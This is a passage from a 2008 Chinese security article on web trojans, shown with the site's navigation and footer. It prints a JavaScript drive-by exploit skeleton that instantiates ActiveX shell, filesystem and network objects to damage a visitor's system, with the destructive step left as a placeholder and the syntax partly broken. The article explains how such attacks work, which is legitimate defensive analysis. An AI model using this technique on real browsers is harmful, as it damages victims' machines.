CTOCIO IT专家网

天极传媒 比特网 | 天极网 | IT专家网 | IT商网 | 52PK游戏网 | 手机天极 | IT分众 |
IT专家网搜索

网络安全,安全,网络安全设备,信息安全产品,网络安全新闻,信息安全市场分析,黑客攻防,防黑反黑技巧,黑客,网络安全技术,网络安全方案,病毒播报,最新病毒库,攻防技巧,入侵渗透,新闻,思科,Juniper,天融信,瑞星,金山,江民,卡巴斯基,赛门铁克, 趋势,绿盟科技,联想网御,MCAFEE,安氏,冰峰网络,网络入侵,木马,病毒,病毒分析,木马分析,样本分析,木马样本分析,病毒样本分析,杀毒软件

您现在的位置: IT专家网 > 安全子站 > 安全技巧

国内资深黑客详谈网页木马

作者: 子明,  出处:51CTO.com, 责任编辑: 韩博颖, 
2008-05-08 09:45
  当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播。

  六、常用网页木马运行原理的分析

  1.Javascript.Exception.Exploit

  常用的攻击代码:

  

      Function destroy(){
  try
  {
  //ActiveX initialization 初始化ActiveX,为修改注册表做准备
  a1=document.applets[0];
  //获取applet运行对象,以下语句指向注册表中有关IE的表项
  a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Shl = a1.GetObject();
  a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
  a1.createInstance();
  FSO = a1.GetObject();
  a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
  a1.createInstance();
  Net = a1.GetObject();
  try
  {
  开始进行破坏
  }
  }
  catch(e)
  {}
  }
  catch(e)
  {}
  }
  function do()
  {
  //初始化函数,并每隔一秒执行修改程序
  setTimeout("destroy()", 1000); //设定运行时间1秒
  }
  Do() //进行破坏的执行函数指令
  这个代码是JAVAScript编写,很简单,但却可以修改受影响系统的注册表,释放垃圾文件,格式化硬盘等。
共9页。 9 1 2 3 4 5 6 7 8 9 :

网友评论

笔名 
请您注意:遵守国家有关法律、法规,尊重网上道德,承担一切因您的行为而直接或间接引起的法律责任。    IT专家网友拥有管理笔名和留言的一切权利。

相关文章

最新文章

  • 周排行榜
  • 月排行榜

邮件订阅


专家答疑

白皮书

    • 解析如何实现自动化的IT安全合规管理评论
      能够解决企业IT、审计和运作团队共同问题的方法一直是企业IT管理者所迫切希望的,自动化的企业合规管理将会及时的发现并掌控企业实际存在的各种问题。
    • 视频讲解:MS Windows系统安全评论
      本文将由7all为IT专家网用户讲解MS Windows操作系统。
    • 浅谈逆向工程在网络安全研究中的运用评论
      从某种程度上来说,计算机软件的逆向工程技术主要过程为分析计算机程序,在分析计算机程序的过程中,逐渐建立起高于源代码级别的更抽象层次的程序运行过程。
    • 评估Vista内核模式的安全性评论
      Windows Vista与之前的MS Windows版本(包括Windows XP SP2)相比增加了很多的安全性。Vista新安全性的特征可以包括驱动签名、PatchGuard、内核模式代码完整性检查等。

Webcast

BBS

该文章的读者还阅读了

Whatis

天极服务 | 关于我们 | 网站律师 | 加入我们 | 联系我们 | 广告业务 | 友情链接 | 我要挑错
All Rights Reserved, Copyright 2004-2008, Ctocio.com.cn
渝ICP证B2-20030003号 如有意见请与我们联系 powered by 天极内容管理平台CMS4i